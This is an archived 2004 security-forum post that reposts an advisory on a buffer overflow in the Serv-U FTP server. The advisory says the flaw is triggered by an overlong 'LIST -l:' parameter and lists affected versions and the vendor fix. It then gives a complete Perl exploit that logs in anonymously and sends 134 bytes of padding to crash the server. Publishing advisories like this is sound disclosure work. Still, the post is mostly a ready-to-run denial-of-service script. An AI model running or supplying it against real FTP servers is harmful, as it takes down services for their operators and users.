hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Serv-u List -l Parameter Buffer Overflow
GovernmentSecurity.org > The Archives > Exploit Articles
alexsen
May 3 2004, 05:43 PM
CODE

Serv-U LIST -l Parameter Buffer Overflow
------------------------------------------------------------------------


Article reference:
http://www.securiteam.com/windowsntfocus/5ZP0G2KCKA.html




SUMMARY

<http://www.serv-u.com/> Serv-U is a "powerful, easy-to-use, award-winning FTP
server" created by Rob Beckers.
A vulnerability in the product allows a remote user to cause the server to
fail by sending a malformed LIST command to the server.

DETAILS

Vulnerable Systems:
* Serv-U older than 5.0.0.6

Immune Systems:
* Serv-U 5.0.0.6 and newer

A user issuing a long parameter (around 134 bytes) as a value for a LIST
command (using the -l: parameter for that LIST command), can cause the server
to try and read a value that is outside the memory location of the Serv-U's
memory, this will cause an exception to be triggered (an unhandled
exception), which in turn causes the program to crash.

Solution:
The vendor has released a new version, which fixes this problem.

Exploit:
#!/usr/bin/perl

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
    PeerAddr => $host,
    PeerPort => "2116",
   );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
 last;
}
}

$remote->autoflush(1);

my $ftp = "USER anonymous\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/331 /)
{
 last;
}
}

$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/230 /)
{
 last;
}
}

my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
print $_;
if (/250 Done/)
{
 last;
}
}

close $remote;
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.